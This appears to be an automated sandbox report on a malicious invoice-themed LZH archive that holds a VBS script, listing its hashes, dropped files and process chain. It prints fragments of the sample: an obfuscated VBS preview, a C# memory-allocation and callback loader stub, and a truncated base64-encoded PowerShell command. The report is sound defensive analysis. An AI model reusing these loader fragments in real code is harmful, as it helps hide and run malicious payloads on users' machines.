      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious

      Private

      IP
      192.168.2.1

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623395
      Start date and time: 10/05/202214:00:442022-05-10 14:00:44 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 27s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:WWVN_INVOICE_8363567453.lzh
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:34
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winLZH@17/12@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .lzh
      • Adjust boot time
      • Enable AMSI

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      14:03:27API Interceptor36x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

      Download File
      Process:C:\Windows\SysWOW64\unarchiver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):388
      Entropy (8bit):5.2529463157768355
      Encrypted:false
      SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk7v:MLF20NaL329hJ5g522r0
      MD5:FF3B761A021930205BEC9D7664AE9258
      SHA1:1039D595C6333358D5F7EE5619FE6794E6F5FDB1
      SHA-256:A3517BC4B1E6470905F9A38466318B302186496E8706F1976F1ED76F3E87AF0F
      SHA-512:1E77D09CF965575EF9800B1EE8947A02D98F88DBFA267300330860757A0C7350AF857A2CB7001C49AFF1F5BD1E0AE6E90F643B27054522CADC730DD14BC3DE11
      Malicious:false
      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..

      C:\Users\user\AppData\Local\Temp\Hetero3.dat

      Download File
      Process:C:\Windows\SysWOW64\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):58767
      Entropy (8bit):7.381111578760272
      Encrypted:false
      SSDEEP:768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
      MD5:7F53C5BDB8BE10B4244A89D5B4580B53
      SHA1:A2A3BF3829D0311E3BCC981D98B7FEE88B830055
      SHA-256:13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
      SHA-512:72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
      Malicious:false
      Preview:......h:....4$.....4$yY.,Z.._1..4.5|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5|..5EX....:.|..5...p8.V..~.qDoo........q.......=...uEy....]..h..|.....14|....[.O..i..:v...ur.d[...E.a.g..14|.o;...9.......=.|'ik.|......1.=d..~.5.5..O5|....;Y5|.]m.A.....5.C......}.._}.i~2.|...X.5..=.5.~...=....._......!......L.....O.&.5...4|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5|MF.....i.|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../|$

      C:\Users\user\AppData\Local\Temp\RES571F.tmp

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):4.004105057259058
      Encrypted:false
      SSDEEP:24:Hoe9EuPVZ1XhHahhKE2mfII+ycuZhNolVakSJlaPNnq9qd:1PVZ1x6vK1mg1ulolVa3JlWq9K
      MD5:B0EC9E5060E4545FF7AD12F445BBA10E
      SHA1:0F3D3E213E6B6A0DFEE51803071A3F8744CF24EE
      SHA-256:4D14F17614C660907F32380B31E715184122DD9F9489E2CB584A82F5DD27DB36
      SHA-512:F115A762435FAA1C463DC89DF4FF4BE6CC76B1F15AB3E352CF1B4886BA444AA7E2DCCDA5A7F1EFF14E459F4538D531160C34B6F3A24F92F92C68CD497578866A
      Malicious:false
      Preview:L...%.zb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP.................!Z.....A.Z...p..........4.......C:\Users\user\AppData\Local\Temp\RES571F.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg2wzxat.uwa.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkspfn2f.hc4.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1

      C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs

      Download File
      Process:C:\Windows\SysWOW64\7za.exe
      File Type:ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):233243
      Entropy (8bit):4.783519118829289
      Encrypted:false
      SSDEEP:3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
      MD5:9F8E253FD51C33A2F874942EBC0D3795
      SHA1:6868A9005489E56542CF0DF063985132FEF50F3D
      SHA-256:C33E4E9BF305CEC123840DD87AA84C6D71E68AC82EA039418E1B8BE3ED791B37
      SHA-512:EB61932008B275FDE416E7E9DF71B0EFAEC9FEEB1A33AF8B98D6C582FAD3A9BC91CFD4450589D3FB0A7CB6601D967C8FFA5F6D023CBBF167F2EB1AC35B054B8C
      Malicious:false
      Preview:'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fasciolar POSTCAVAL MEDIA Tremaetc5 SYMPATIS tilr DISP sleddedas Bonde aabnings MRKELGG Evakue4 Styrkel Trokl Busesubse2 Ungkvg sdbank ..'Outsol GARBEDANS OKSEHO Taeni Psizedo3 EVASIO PHASEO Tamiletsa Scat thridacium LETFRD Fontaine3 sogneprs Dikag NATURA UGLESEEN Sols Ubarmhje8 Ufordjet4 Fibrilla7 Heckim6 VGGETJE Elek skrmformat ..'HAVANCE NOTELES bedv UDVIKLING NIVERNAIS Pruinoseh Passadesu9 Puttie disa samtaleem Konst DICTUMSF Ulykkess Topia VIBICESDE Brimm9 Afterwor stik Udva budgedbr Unencomp4 inderkr Distinctio8 Rensk8 Atkasn7 vragr poll UDSME KARDU Blaa5 SIDEB Samleta2 ..'Kettlec Bverrot Forulem4 EMUSGRA Taalmodigh6 Coan Udsondrend5 TEMP lacunulose Skkel1 Puff3 Entrench kuls monologia GLOBULITI gang Lithyin3 Dvekonsule3 Anci9 Unhor9 U

      C:\Users\user\AppData\Local\Temp\tpled5lu.bpn\unarchiver.log

      Download File
      Process:C:\Windows\SysWOW64\unarchiver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1484
      Entropy (8bit):5.220609326683011
      Encrypted:false
      SSDEEP:24:OmIkTHiJ1iJjWI1iJ1iJUwPiJfgJ0iJ1iJFTEIhiJbriJ/IhiJoniJvriJ1iJxpX:OCTHG1Gb1G1GpPG4J0G1GpVGbrGkGqGB
      MD5:1A42F581BED47873DA816E9099BE908B
      SHA1:CF1E6BE6927B01CF89DB831A192ED38E39FE6D21
      SHA-256:54C67ECB8096700214EE886CABC4EB1E4B484A3B7B9FDB5ADF20B8B946BB17A7
      SHA-512:4284BC6B7060162DAC693E2AEC9123232A4DF2FCF28D0991F365D6C22ADD7E38C2780383E6012860672557140621D954D2DF00365F13DAA8754A47E330E1C355
      Malicious:false
      Preview:05/10/2022 2:01 PM: Unpack: C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: Scanning the drive for archives:..05/10/2022 2:01 PM: Received from standard out: 1 file, 73940 bytes (73 KiB)..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: Extracting archive: C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Received from standard out: --..05/10/2022 2:01 PM: Received from standard out: Path = C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Received from standard out: Type = Lzh..05/10/2022 2:01 PM: Received from standard out: Physical Size = 73940..05/10

      C:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.1106579435914563
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryilVak7YnqqJlaPN5Dlq5J:+RI+ycuZhNolVakSJlaPNnqX
      MD5:84215AD9E285C4F0F9410E5AEADA0E70
      SHA1:4742FEB9B2E98B937DAF14984AB550D33BFD9D94
      SHA-256:9E2265A3B8030D91FB3A9BF8D4C6BD03211CF9643FDB5E6B39F6BC4855F1FF20
      SHA-512:A7513C2FAC06CF52E45C9448C83D431D8DC5DDCAB18399FDA10D2888F561066F91FE2E0FC5C8462CB1179FCA5173894AE7EDA7854E98700AB0A3E6F320C97F09
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

      C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.0.cs

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):882
      Entropy (8bit):5.226399550729973
      Encrypted:false
      SSDEEP:24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
      MD5:EA505B82FAD07E00D99FD3C7A36FF79A
      SHA1:68B8F59916AFB004F83158D741B1C75E02F2E83B
      SHA-256:AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
      SHA-512:BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}

      C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.326693439812667
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVHNtqzxs7+AEszIWXp+N23fVHNtP:p37Lvkmb6KHVNtqWZE8VNtP
      MD5:869E92FF635D9FED689AFE20E52D58ED
      SHA1:C19D30EC578084E24EDBE707EBFCC63DC6FDAEBE
      SHA-256:9D28F86DE8DF3A43B8DE93AC8A3AD64A7292FA05E781EDAADC33A40B12A70335
      SHA-512:BA57011564C6DBD4DF17A58D2DD3725E55C01047C0A019E55E73972AD36E16560442F45DBFC03A162FC94253E40B6F8DB6D116DF8A29A97D20F14A318C508C3A
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.0.cs"

      C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dll

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.27949206385496
      Encrypted:false
      SSDEEP:48:63PW4BCJTLrL9CzfXK4j5SuJG5ZO1ulolVa3JlWq:aW3J/H9m3SLtYK
      MD5:0714DE4FE2608F69E235ADAE7871568F
      SHA1:B163DC964F2F1D77CD8A59BA8C1BAFF690D1DDD7
      SHA-256:7888C50A8E40D31D9F018571271888E34438B3031057C2192434E9D44EDA3EEB
      SHA-512:CC5E6F4640D3DAE3AC7C41C528A44EDF934841BC9880AA6966A972AE94B54D3AE10C00AD837E9FF77E1153A9288BE6636CB0A93407B6A2EE8FF35FD94B53DECC
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.zb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................|.....|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................

      C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.out

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.358268581824368
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHVNtLE8VNt2KaM5DqBVKVrdFAMBJTH:Uika6AVNtLE8VNt2KxDcVKdBJj
      MD5:A2EBBF9F008E3D339A66CF363B953698
      SHA1:9D6B4B709B38E26C02E63649F8B6C1BA0EF09D43
      SHA-256:F2668F01FC8A7EDDA9F2257FFEE8DA1BC623D35FDD46A5395F3BB5427C39C640
      SHA-512:7BB9D621BA592C8BD2EE94B0D8028D72F3F62B0FA10333773008BC9B0DAE32B610E516603375EEC16708451B73FB8C947E0DBCA387282582AEA09114AE6AA0B3
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

      Static File Info

      General

      File type: LHa (2.x) archive data [lh5], with "WWVN_INVOICE_8363567453.vbs"
      Entropy (8bit):7.997133909457168
      TrID:
      • LHARC/LZARK compressed archive (6/4) 100.00%
      File name:WWVN_INVOICE_8363567453.lzh
      File size:73940
      MD5:1492683d46a38dc3af26589b486d55ab
      SHA1:d7dd2f48e26ca1683643f5671d5a5b7a26da73e0
      SHA256:8e55ce0d37045fc2d93dde800ae6fea90c6c71d29c5b28837a61d749d5a7810f
      SHA512:6c7b511d4b1af00245aa2ca2c16b3cd6b43f8ab53862dc2e27c1c1110a22337d5754546312265a7a89ab2c8c054275ecdb3071162d42e527993c3edcc3ee3a23
      SSDEEP:1536:m95dctU9sV5fvcFVmKSLPztJupjcaUwT0jVkQsoqaEnAu533XByCm:mVV0KSrzSt6w4VkQvqaEnAuZXB7m
      TLSH:3273025F5872AA4774EF0036B341C768FBA931893869F39714886BDB1D1BF91118AC8C
      File Content Preview:11-lh5-. ......'..T ..WWVN_INVOICE_8363567453.vbs..:X.}v.9m....u.......-.r...{.j.U...2LRL.......^..q]...w....}_V..fo.=.< ~3...b9..C....8.....b0..d1..y.w......._.......|x.a....g.....V..=.m.||..........^.:.vm.|.s..p....n.=..yl.8c.?...8.....-.->8tsr.....v...

      File Icon

      Icon Hash:00828e8e8686b000

      Network Behavior

      No network behavior found

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:14:01:45
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\unarchiver.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
      Imagebase:0x470000
      File size:10752 bytes
      MD5 hash:F737DE1D0C50E20064ACCB6647B50F6C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      General

      Target ID:1
      Start time:14:01:47
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\7za.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
      Imagebase:0xfc0000
      File size:289792 bytes
      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:2
      Start time:14:01:47
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:6
      Start time:14:01:52
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
      Imagebase:0xc20000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:7
      Start time:14:01:52
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:8
      Start time:14:01:53
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
      Imagebase:0x2a0000
      File size:147456 bytes
      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:22
      Start time:14:03:01
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEA